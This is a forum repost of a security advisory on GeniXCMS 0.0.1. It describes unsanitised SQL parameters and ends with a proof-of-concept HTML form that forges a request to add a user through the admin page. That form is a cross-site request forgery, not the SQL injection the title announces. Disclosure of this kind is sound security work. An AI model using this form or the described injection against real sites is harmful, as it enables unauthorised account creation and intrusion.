Aerosol Posted March 10, 2015 Report Posted March 10, 2015 GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection ExploitVendor: MetalGenixProduct web page: http://www.genixcms.orgAffected version: 0.0.1Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer toAdvanced Developer. Some manual configurations are needed to make this application towork.Desc: Input passed via the 'page' GET parameter and the 'username' POST parameter is notproperly sanitised before being used in SQL queries. This can be exploited to manipulateSQL queries by injecting arbitrary SQL code.Tested on: nginx/1.4.6 (Ubuntu) Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2015-5234Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5234.php[/url]05.03.2015---<html> <body> <form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST"> <input type="hidden" name="userid" value="Testingus" /> <input type="hidden" name="pass1" value="123456" /> <input type="hidden" name="pass2" value="123456" /> <input type="hidden" name="email" value="t00t@zeroscience.eu" /> <input type="hidden" name="group" value="0" /> <input type="hidden" name="adduser" value="" /> <input type="submit" value="Forge!" /> </form> </body></html>Source Quote
